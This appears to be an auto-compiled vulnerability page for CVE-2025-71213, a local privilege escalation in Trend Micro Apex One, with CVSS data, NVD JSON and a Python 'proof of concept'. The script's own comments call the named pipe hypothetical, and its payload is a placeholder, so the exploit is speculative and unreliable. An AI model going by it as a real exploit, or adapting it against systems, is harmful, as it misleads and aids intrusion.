Security Vulnerability Report
中文
CVE-2025-71213 CVSS 7.8 HIGH

CVE-2025-71213

Published: 2026-05-21 14:16:44
Last Modified: 2026-05-21 15:05:28

Description

An origin validation error vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Trend Micro Apex One (具体受影响版本请参考厂商官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept (Conceptual) for CVE-2025-71213 # This script demonstrates the logic of bypassing origin validation. import os import ctypes def exploit(): print("[*] Attempting to connect to vulnerable Apex One service...") # Hypothetical vulnerable pipe or interface target_interface = r"\\.\pipe\ApexOneCoreService" try: # Low-privileged user attempts to open a handle to the privileged service handle = ctypes.windll.kernel32.CreateFileW( target_interface, 0x40000000, # GENERIC_WRITE 0, None, 3, # OPEN_EXISTING 0, None ) if handle == -1: print("[-] Service not found or access denied.") return # Craft payload to escalate privileges (e.g., update config) # Exploiting the lack of origin validation payload = b"UPDATE_CONFIG|SOURCE:attacker_controlled_path" bytes_written = ctypes.c_ulong(0) success = ctypes.windll.kernel32.WriteFile( handle, payload, len(payload), ctypes.byref(bytes_written), None ) if success: print("[+] Payload sent successfully. Triggering privilege escalation...") else: print("[-] Failed to send payload.") ctypes.windll.kernel32.CloseHandle(handle) except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71213", "sourceIdentifier": "[email protected]", "published": "2026-05-21T14:16:43.897", "lastModified": "2026-05-21T15:05:28.023", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An origin validation error vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations.\r\n\r\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "references": [{"url": "https://success.trendmicro.com/en-US/solution/KA-0022458", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-140/", "source": "[email protected]"}]}}